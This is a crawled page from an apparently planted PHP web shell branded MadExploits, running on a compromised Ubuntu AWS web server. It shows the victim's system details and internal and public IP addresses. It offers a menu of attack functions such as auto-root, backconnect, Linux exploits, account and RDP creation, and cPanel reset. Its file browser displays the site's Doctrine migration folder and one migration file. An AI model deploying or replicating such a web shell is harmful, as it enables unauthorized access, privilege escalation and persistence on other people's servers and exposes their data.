Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.136.22.241
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
Version20201203114504.php
2.24
KB
-rw-rw-r--
Version20201207200548.php
1.15
KB
-rw-rw-r--
Version20201207201703.php
866
B
-rw-rw-r--
Version20201207201955.php
1.14
KB
-rw-rw-r--
Version20201208070726.php
1.77
KB
-rw-rw-r--
Version20201216101536.php
2.12
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Version20201207200548.php
<?php declare(strict_types=1); namespace DoctrineMigrations; use Doctrine\DBAL\Schema\Schema; use Doctrine\Migrations\AbstractMigration; /** * Auto-generated Migration: Please modify to your needs! */ final class Version20201207200548 extends AbstractMigration { public function getDescription() : string { return ''; } public function up(Schema $schema) : void { // this up() migration is auto-generated, please modify it to your needs $this->addSql('ALTER TABLE release_order ADD depot_id_id INT DEFAULT NULL'); $this->addSql('ALTER TABLE release_order ADD CONSTRAINT FK_76B7E1EF19B5CDF0 FOREIGN KEY (depot_id_id) REFERENCES depot (id)'); $this->addSql('CREATE INDEX IDX_76B7E1EF19B5CDF0 ON release_order (depot_id_id)'); } public function down(Schema $schema) : void { // this down() migration is auto-generated, please modify it to your needs $this->addSql('ALTER TABLE release_order DROP FOREIGN KEY FK_76B7E1EF19B5CDF0'); $this->addSql('DROP INDEX IDX_76B7E1EF19B5CDF0 ON release_order'); $this->addSql('ALTER TABLE release_order DROP depot_id_id'); } }
Close